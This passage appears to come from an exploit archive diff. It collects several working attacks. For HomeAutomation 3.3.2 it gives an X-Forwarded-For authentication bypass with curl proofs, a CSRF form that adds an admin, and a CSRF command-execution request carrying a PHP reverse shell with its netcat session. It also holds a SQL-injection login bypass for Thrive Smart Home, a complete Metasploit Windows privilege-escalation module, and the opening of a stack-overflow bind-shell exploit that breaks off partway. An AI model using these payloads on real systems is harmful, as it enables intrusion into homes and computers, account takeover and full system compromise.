Product web page: http://karpero.mine.nu/ha/
|
||||
Affected version: 3.3.2
|
||||
|
||||
Summary: HomeAutomation is an open-source web interface and scheduling solution.
|
||||
It was initially made for use with the Telldus TellStick, but is now based on a
|
||||
plugin system and except for Tellstick it also comes with support for Crestron,
|
||||
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
|
||||
etc.) based on an advanced scheduling system, taking into account things like
|
||||
measurements from various sensors. With the houseplan view you can get a simple
|
||||
overview of the status of your devices at their location in your house.
|
||||
|
||||
Desc: The application suffers from an authentication bypass vulnerability when
|
||||
spoofing client IP address using the X-Forwarded-For header with the local (loopback)
|
||||
IP address value allowing remote control of the smart home solution.
|
||||
|
||||
===============================================================================
|
||||
/modules/login/login.module.php:
|
||||
--------------------------------
|
||||
19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); }
|
||||
20:
|
||||
21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "")
|
||||
22: {
|
||||
23: // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin.
|
||||
24: $action = "login";
|
||||
25: }
|
||||
26:
|
||||
27: ?>
|
||||
|
||||
===============================================================================
|
||||
/functions.php:
|
||||
---------------
|
||||
733: function isIpLocal() {
|
||||
734:
|
||||
735: if(substr(getIpAddress(), 0, 4) == "127.") {
|
||||
736: return true;
|
||||
737: }
|
||||
738:
|
||||
739: $isIpLocal = false;
|
||||
740:
|
||||
741: $localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"];
|
||||
742:
|
||||
743: $localnets = explode(";", $localip);
|
||||
744: foreach($localnets as $localnet) {
|
||||
745: list($localnet, $localmask) = explode("/", $localnet);
|
||||
746: if($localmask == "") {
|
||||
747: $localmask = 32;
|
||||
748: }
|
||||
749: if($localmask == "" || $localmask > 32 || $localmask < 0) {
|
||||
750: $localmask = 32;
|
||||
751: }
|
||||
752:
|
||||
753: // $mask = $localmask;
|
||||
754:
|
||||
755: $localnet = ip2long($localnet);
|
||||
756: $localmask = ~((1 << (32-$localmask)) - 1);
|
||||
757: $remoteip = ip2long(getIpAddress());
|
||||
758: $maskedip = $remoteip & $localmask;
|
||||
759: $maskednet = $localnet & $localmask;
|
||||
760:
|
||||
761: // echo "<br />localnet:";
|
||||
762: // printf('%1$32b', $localnet);
|
||||
763:
|
||||
764: // echo "<br />localmask: (dec: ".$mask.")";
|
||||
765: // printf('%1$32b', $localmask);
|
||||
766:
|
||||
767: // echo "<br />remoteip:";
|
||||
768: // printf('%1$32b', $remoteip);
|
||||
769:
|
||||
770: // echo "<br />maskedip:";
|
||||
771: // printf('%1$32b', $maskedip);
|
||||
772:
|
||||
773: // echo "<br />maskednet:";
|
||||
774: // printf('%1$32b', $maskednet);
|
||||
775:
|
||||
776: if($maskedip == $maskednet) {
|
||||
777: // echo "<br />maskedip == maskednet";
|
||||
778: $isIpLocal = true;
|
||||
779: break;
|
||||
780: }
|
||||
781: }
|
||||
782: // $isIpLocal = false;
|
||||
783: return $isIpLocal;
|
||||
784: }
|
||||
785:
|
||||
786: function getIpAddress() {
|
||||
787: return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
|
||||
788: }
|
||||
===============================================================================
|
||||
|
||||
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
Apache/2.4.29 (Ubuntu)
|
||||
PHP/7.4.0RC4
|
||||
PHP/7.3.11
|
||||
PHP 7.2.24-0ubuntu0.18.04.1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5557
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
|
||||
|
||||
|
||||
06.11.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
PoC auth bypass and arbitrary cookie setup grepping auth'd content view:
|
||||
------------------------------------------------------------------------
|
||||
|
||||
root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
|
||||
* Trying 192.168.2.113...
|
||||
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
|
||||
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
|
||||
* found 696 certificates in /etc/ssl/certs
|
||||
* ALPN, offering h2
|
||||
* ALPN, offering http/1.1
|
||||
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
|
||||
* server certificate verification SKIPPED
|
||||
* server certificate status verification SKIPPED
|
||||
* common name: n28.nux.se (does not match '192.168.2.113')
|
||||
* server certificate expiration date OK
|
||||
* server certificate activation date OK
|
||||
* certificate public key: RSA
|
||||
* certificate version: #3
|
||||
* subject: CN=n28.nux.se
|
||||
* start date: Mon, 21 Oct 2019 12:18:27 GMT
|
||||
* expire date: Sun, 19 Jan 2020 12:18:27 GMT
|
||||
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
|
||||
* compression: NULL
|
||||
* ALPN, server accepted to use http/1.1
|
||||
> GET /index.php HTTP/1.1
|
||||
> Host: 192.168.2.113
|
||||
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
|
||||
> Accept: */*
|
||||
> Cookie: PHPSESSID=11111111110000000000666666
|
||||
> X-Forwarded-For: 127.31.33.7
|
||||
>
|
||||
< HTTP/1.1 303 See Other
|
||||
< Date: Wed, 20 Nov 2019 01:06:16 GMT
|
||||
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
< X-Powered-By: PHP/7.3.11
|
||||
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
< Cache-Control: no-store, no-cache, must-revalidate
|
||||
< Pragma: no-cache
|
||||
< Strict-Transport-Security: max-age=63072000; includeSubdomains
|
||||
< X-Frame-Options: DENY
|
||||
< X-Content-Type-Options: nosniff
|
||||
< Location: ./index.php?page=houseplan
|
||||
< Content-Length: 0
|
||||
< Content-Type: text/html; charset=UTF-8
|
||||
<
|
||||
* Connection #0 to host 192.168.2.113 left intact
|
||||
* Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan'
|
||||
* Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline]
|
||||
* Re-using existing connection! (#0) with host 192.168.2.113
|
||||
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
|
||||
> GET /index.php?page=houseplan HTTP/1.1
|
||||
> Host: 192.168.2.113
|
||||
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
|
||||
> Accept: */*
|
||||
> Cookie: PHPSESSID=11111111110000000000666666
|
||||
> X-Forwarded-For: 127.31.33.7
|
||||
>
|
||||
< HTTP/1.1 200 OK
|
||||
< Date: Wed, 20 Nov 2019 01:06:16 GMT
|
||||
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
< X-Powered-By: PHP/7.3.11
|
||||
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
< Cache-Control: no-store, no-cache, must-revalidate
|
||||
< Pragma: no-cache
|
||||
< Strict-Transport-Security: max-age=63072000; includeSubdomains
|
||||
< X-Frame-Options: DENY
|
||||
< X-Content-Type-Options: nosniff
|
||||
< Transfer-Encoding: chunked
|
||||
< Content-Type: text/html; charset=UTF-8
|
||||
<
|
||||
{ [6 bytes data]
|
||||
* </li><li>| <a href="./index.php?page=macros">Macros</a>
|
||||
Connection #0 to host 192.168.2.113 left intact
|
||||
root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
|
||||
* Trying 192.168.2.113...
|
||||
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
|
||||
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
|
||||
* found 696 certificates in /etc/ssl/certs
|
||||
* ALPN, offering h2
|
||||
* ALPN, offering http/1.1
|
||||
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
|
||||
* server certificate verification SKIPPED
|
||||
* server certificate status verification SKIPPED
|
||||
* common name: n28.nux.se (does not match '192.168.2.113')
|
||||
* server certificate expiration date OK
|
||||
* server certificate activation date OK
|
||||
* certificate public key: RSA
|
||||
* certificate version: #3
|
||||
* subject: CN=n28.nux.se
|
||||
* start date: Mon, 21 Oct 2019 12:18:27 GMT
|
||||
* expire date: Sun, 19 Jan 2020 12:18:27 GMT
|
||||
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
|
||||
* compression: NULL
|
||||
* ALPN, server accepted to use http/1.1
|
||||
> GET /index.php HTTP/1.1
|
||||
> Host: 192.168.2.113
|
||||
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
|
||||
> Accept: */*
|
||||
> Cookie: PHPSESSID=11111111110000000000666666
|
||||
>
|
||||
< HTTP/1.1 200 OK
|
||||
< Date: Wed, 20 Nov 2019 01:06:25 GMT
|
||||
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
< X-Powered-By: PHP/7.3.11
|
||||
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
< Cache-Control: no-store, no-cache, must-revalidate
|
||||
< Pragma: no-cache
|
||||
< Strict-Transport-Security: max-age=63072000; includeSubdomains
|
||||
< X-Frame-Options: DENY
|
||||
< X-Content-Type-Options: nosniff
|
||||
< Transfer-Encoding: chunked
|
||||
< Content-Type: text/html; charset=UTF-8
|
||||
<
|
||||
{ [6 bytes data]
|
||||
</li><li>| <a href="./index.php?page=macros">Macros</a>
|
||||
* Connection #0 to host 192.168.2.113 left intact
|
||||
root@kali:~/homeautomation#
|
||||
|
||||
|
||||
PoC auth bypass retrieving valid Cookie:
|
||||
-----------------------------------------
|
||||
|
||||
root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt
|
||||
Your cookie: k4dic6crpr4d4u71tr13gvtmsv
|
68
exploits/php/webapps/47808.txt
Normal file
68
exploits/php/webapps/47808.txt
Normal file
|
@ -0,0 +1,68 @@
|
|||
# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: Tom Rosenback and Daniel Malmgren
|
||||
# Product web page: http://karpero.mine.nu/ha/
|
||||
# Affected version: 3.3.2
|
||||
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
# Advisory ID: ZSL-2019-5558
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
|
||||
|
||||
|
||||
HomeAutomation v3.3.2 CSRF Add Admin Exploit
|
||||
|
||||
|
||||
Vendor: Tom Rosenback and Daniel Malmgren
|
||||
Product web page: http://karpero.mine.nu/ha/
|
||||
Affected version: 3.3.2
|
||||
|
||||
Summary: HomeAutomation is an open-source web interface and scheduling solution.
|
||||
It was initially made for use with the Telldus TellStick, but is now based on a
|
||||
plugin system and except for Tellstick it also comes with support for Crestron,
|
||||
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
|
||||
etc.) based on an advanced scheduling system, taking into account things like
|
||||
measurements from various sensors. With the houseplan view you can get a simple
|
||||
overview of the status of your devices at their location in your house.
|
||||
|
||||
Desc: The application interface allows users to perform certain actions via HTTP
|
||||
requests without performing any validity checks to verify the requests. This can
|
||||
be exploited to perform certain actions with administrative privileges if a logged-in
|
||||
user visits a malicious web site.
|
||||
|
||||
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
Apache/2.4.29 (Ubuntu)
|
||||
PHP/7.4.0RC4
|
||||
PHP/7.3.11
|
||||
PHP 7.2.24-0ubuntu0.18.04.1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5558
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
|
||||
|
||||
|
||||
06.11.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST">
|
||||
<input type="hidden" name="id" value="-1" />
|
||||
<input type="hidden" name="action" value="save" />
|
||||
<input type="hidden" name="editable" value="2" />
|
||||
<input type="hidden" name="username" value="testingus" />
|
||||
<input type="hidden" name="password" value="123456" />
|
||||
<input type="hidden" name="firstname" value="Tester" />
|
||||
<input type="hidden" name="lastname" value="Testovski" />
|
||||
<input type="hidden" name="email" value="test@zeroscience.mk" />
|
||||
<input type="hidden" name="userlevel" value="3" />
|
||||
<input type="hidden" name="save" value="Save" />
|
||||
<input type="submit" value="Addmoi" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
96
exploits/php/webapps/47809.txt
Normal file
96
exploits/php/webapps/47809.txt
Normal file
|
@ -0,0 +1,96 @@
|
|||
# Exploit: HomeAutomation 3.3.2 - Remote Code Execution
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: Tom Rosenback and Daniel Malmgren
|
||||
# Product web page: http://karpero.mine.nu/ha/
|
||||
# Affected version: 3.3.2
|
||||
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
# Advisory ID: ZSL-2019-5560
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
|
||||
|
||||
HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC
|
||||
|
||||
Vendor: Tom Rosenback and Daniel Malmgren
|
||||
Product web page: http://karpero.mine.nu/ha/
|
||||
Affected version: 3.3.2
|
||||
|
||||
Summary: HomeAutomation is an open-source web interface and scheduling solution.
|
||||
It was initially made for use with the Telldus TellStick, but is now based on a
|
||||
plugin system and except for Tellstick it also comes with support for Crestron,
|
||||
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
|
||||
etc.) based on an advanced scheduling system, taking into account things like
|
||||
measurements from various sensors. With the houseplan view you can get a simple
|
||||
overview of the status of your devices at their location in your house.
|
||||
|
||||
Desc: The application suffers from an authenticated OS command execution vulnerability
|
||||
using custom command v0.1 plugin. This can be exploited with CSRF vulnerability to
|
||||
execute arbitrary shell commands as the web user via the 'set_command_on' and 'set_command_off'
|
||||
POST parameters in '/system/systemplugins/customcommand/customcommand.plugin.php' by
|
||||
using an unsanitized PHP exec() function.
|
||||
|
||||
===============================================================================
|
||||
/system/systemplugins/customcommand/customcommand.plugin.php:
|
||||
-------------------------------------------------------------
|
||||
|
||||
77: function toggleDevices($devicesToToggle, $statuses) {
|
||||
78: $output = array();
|
||||
79: $command = "";
|
||||
80:
|
||||
81: foreach($devicesToToggle as $device)
|
||||
82: {
|
||||
83: $status = $statuses[$device["id"]];
|
||||
84: if($status == 0) {
|
||||
85: $command = $this->getSettings("command_off");
|
||||
86: } else {
|
||||
87: $command = $this->getSettings("command_on");
|
||||
88: }
|
||||
89:
|
||||
90: if(!empty($command)) {
|
||||
91: $command = replaceCustomStrings($command, $device, $statuses[$device["id"]]);
|
||||
92:
|
||||
93: exec($command, $output);
|
||||
94:
|
||||
95: SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output));
|
||||
96: }
|
||||
97: }
|
||||
98:
|
||||
99: return "";
|
||||
100: }
|
||||
===============================================================================
|
||||
|
||||
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
Apache/2.4.29 (Ubuntu)
|
||||
PHP/7.4.0RC4
|
||||
PHP/7.3.11
|
||||
PHP 7.2.24-0ubuntu0.18.04.1
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5560
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
|
||||
|
||||
|
||||
06.11.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1
|
||||
|
||||
plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save
|
||||
|
||||
-
|
||||
|
||||
lqwrm@metalgear:/$ nc -lvp 4444
|
||||
Listening on [0.0.0.0] (family 0, port 4444)
|
||||
Connection from localhost 40724 received!
|
||||
/bin/sh: 0: can't access tty; job control turned off
|
||||
$ id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
$ pwd
|
||||
/var/www/html/homeautomation_v3_3_2
|
||||
$ exit
|
||||
lqwrm@metalgear:/$
|
66
exploits/php/webapps/47814.txt
Normal file
66
exploits/php/webapps/47814.txt
Normal file
|
@ -0,0 +1,66 @@
|
|||
# Exploit: Thrive Smart Home 1.1 - Authentication Bypass
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: Thrive
|
||||
# Product web page: http://www.thrivesmarthomes.com
|
||||
# Affected version: 1.1
|
||||
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
# Advisory ID: ZSL-2019-5554
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php
|
||||
|
||||
|
||||
Thrive Smart Home v1.1 SQL Injection Authentication Bypass
|
||||
|
||||
|
||||
Vendor: Thrive
|
||||
Product web page: http://www.thrivesmarthomes.com
|
||||
Affected version: 1.1
|
||||
|
||||
Summary: As smart home technology becomes more affordable and easy to
|
||||
install with services offered by Thrive Smart Homes, there are some
|
||||
great options available to give your home a high-tech makeover. If the
|
||||
convenience of feeding your cat or turning on your air conditioning with
|
||||
a tap on your smartphone isn't enough of a reason to make the investment,
|
||||
consider how conveniently you can protect your home and belongings. From
|
||||
Wi-Fi-equipped smoke detectors to plugs with auto turn-offs, smart homes
|
||||
with their always-on connectivity and notifications systems allow consumers
|
||||
to quickly respond to the unexpected. For instance, if you install a smart
|
||||
water leak and moisture monitoring device, you can set up alerts on your
|
||||
phone for unusual changes in moisture and stop leaks before they cause major
|
||||
flooding or mold. It's a convenient way to proactively protect your home
|
||||
from costly damage, whether it's an overflowing laundry tub, a cracked
|
||||
washer hose, or a leaky water heater.
|
||||
|
||||
Desc: The application suffers from an SQL Injection vulnerability. Input
|
||||
passed through 'user' POST parameter in checklogin.php is not properly
|
||||
sanitised before being returned to the user or used in SQL queries. This
|
||||
can be exploited to manipulate SQL queries by injecting arbitrary SQL
|
||||
code and bypass the authentication mechanism.
|
||||
|
||||
Tested on: Apache httpd 2.4.25 (Raspbian)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5554
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5554.php
|
||||
|
||||
|
||||
21.10.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
$ curl http://192.168.1.1:8080/raspberry/include/checklogin.php -X POST -d"submit=LOGIN&user=' or 1=1#&pass=pass" -i
|
||||
HTTP/1.1 302 Found
|
||||
Date: Mon, 21 Oct 2019 23:35:18 GMT
|
||||
Server: Apache/2.4.25 (Raspbian)
|
||||
Set-Cookie: PHPSESSID=6cu3frj0qes9c96v5de5vp37e2; path=/
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate
|
||||
Pragma: no-cache
|
||||
location: ../home.php
|
||||
Content-Length: 1
|
||||
Content-Type: text/html; charset=UTF-8
|
149
exploits/windows/local/47805.rb
Executable file
149
exploits/windows/local/47805.rb
Executable file
|
@ -0,0 +1,149 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/post/common'
|
||||
require 'msf/core/post/file'
|
||||
require 'msf/core/post/windows/priv'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
|
||||
'Description' => %q(
|
||||
This exploit uses two vulnerabilities to execute a command as an elevated user.
|
||||
The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
|
||||
NT AUTHORITY\LOCAL SERVICE
|
||||
The second (CVE-2019-1322) leverages the Update Orchestrator Service to
|
||||
elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)
|
||||
'hoangprod', # PoC
|
||||
'bwatters-r7' # msf module
|
||||
],
|
||||
'Platform' => ['win'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows x64', { 'Arch' => ARCH_X64 }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 12 2019',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2019-1322'],
|
||||
['CVE', '2019-1405'],
|
||||
['EDB', '47684'],
|
||||
['URL', 'https://github.com/apt69/COMahawk'],
|
||||
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
|
||||
['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'DisablePayloadHandler' => false
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('EXPLOIT_NAME',
|
||||
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
|
||||
OptString.new('PAYLOAD_NAME',
|
||||
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
|
||||
OptString.new('WRITABLE_DIR',
|
||||
[false, 'Path to write binaries (%TEMP% by default).', nil]),
|
||||
OptInt.new('EXPLOIT_TIMEOUT',
|
||||
[true, 'The number of seconds to wait for exploit to finish running', 60]),
|
||||
OptInt.new('EXECUTE_DELAY',
|
||||
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
|
||||
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
|
||||
exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
|
||||
payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
|
||||
temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
|
||||
payload_path = "#{temp_path}\\#{payload_name}"
|
||||
exploit_path = "#{temp_path}\\#{exploit_name}"
|
||||
payload_exe = generate_payload_exe
|
||||
|
||||
# Check target
|
||||
vprint_status("Checking Target")
|
||||
validate_active_host
|
||||
validate_target
|
||||
fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)
|
||||
|
||||
# Upload Exploit
|
||||
vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
|
||||
ensure_clean_destination(exploit_path)
|
||||
exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
|
||||
write_file(exploit_path, exploit_bin)
|
||||
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
|
||||
|
||||
# Upload Payload
|
||||
vprint_status("Uploading Payload")
|
||||
ensure_clean_destination(payload_path)
|
||||
write_file(payload_path, payload_exe)
|
||||
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
|
||||
print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
|
||||
|
||||
# Run Exploit
|
||||
vprint_status("Running Exploit")
|
||||
print_status("It may take a moment after the session is established for the exploit to exit safely.")
|
||||
begin
|
||||
cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
|
||||
rescue Rex::TimeoutError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error("Caught timeout. Exploit may be taking longer or it may have failed.")
|
||||
end
|
||||
vprint_status("Cleaning up #{exploit_path}")
|
||||
ensure_clean_destination(exploit_path)
|
||||
end
|
||||
|
||||
def validate_active_host
|
||||
begin
|
||||
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
raise Msf::Exploit::Failed, 'Could not connect to session'
|
||||
end
|
||||
end
|
||||
|
||||
def validate_target
|
||||
if sysinfo['Architecture'] == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
|
||||
end
|
||||
sysinfo_value = sysinfo['OS']
|
||||
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
|
||||
vprint_status("Build Number = #{build_num}")
|
||||
unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)
|
||||
fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
|
||||
end
|
||||
end
|
||||
|
||||
def ensure_clean_destination(path)
|
||||
return unless file?(path)
|
||||
print_status("#{path} already exists on the target. Deleting...")
|
||||
begin
|
||||
file_rm(path)
|
||||
print_status("Deleted #{path}")
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error("Unable to delete #{path}")
|
||||
end
|
||||
end
|
||||
end
|
114
exploits/windows/local/47810.py
Executable file
114
exploits/windows/local/47810.py
Executable file
|
@ -0,0 +1,114 @@
|
|||
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
|
||||
# Date: December 2019-12-28
|
||||
# Exploit Author: boku
|
||||
# Original DoS: https://www.exploit-db.com/exploits/47788
|
||||
# Original DoS Author: ZwX
|
||||
# Software Vendor: http://www.avs4you.com/
|
||||
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
|
||||
# Version: 9.1.2.600
|
||||
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
|
||||
# Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601
|
||||
|
||||
#!/usr/bin/python
|
||||
# Recreate:
|
||||
# 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
|
||||
# 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
|
||||
# 3) Install & Open AVS Audio Converter 9.1.2.600.
|
||||
# 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
|
||||
# 5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
|
||||
# 6) Click the 'Browse...' button; to the right of the textbox.
|
||||
# - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
|
||||
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
|
||||
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
|
||||
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet
|
||||
File = 'bind9999.txt'
|
||||
try:
|
||||
# 0x00400000 [AVSAudioConverter.exe]
|
||||
# 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
|
||||
# - The only module that has SafeSEH disabled.
|
||||
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
|
||||
# 0x00400000 | 0x00f33000 | False | False | False | False | False |
|
||||
# - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
|
||||
offEdx = '\x41'*260
|
||||
edx = '\x42\x42\x42\x42' # EDX overwrite at 260 bytes. EDX=0x42424242
|
||||
# SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
|
||||
nSEH = '\x42'*4
|
||||
SEH = '\x43'*4
|
||||
# - If address at offset 308 is not readable, then the program will throw an exception at:
|
||||
# 75F9ECE7 3806 cmp byte ptr ds:[esi], al
|
||||
# [!] Access violation when reading [esi]
|
||||
# - If we can get past this exception, we can overwrite EIP at offset 304.
|
||||
# - [esi] must be successfully overwriten so we can put our payload after it.
|
||||
offEip = '\x45'*32
|
||||
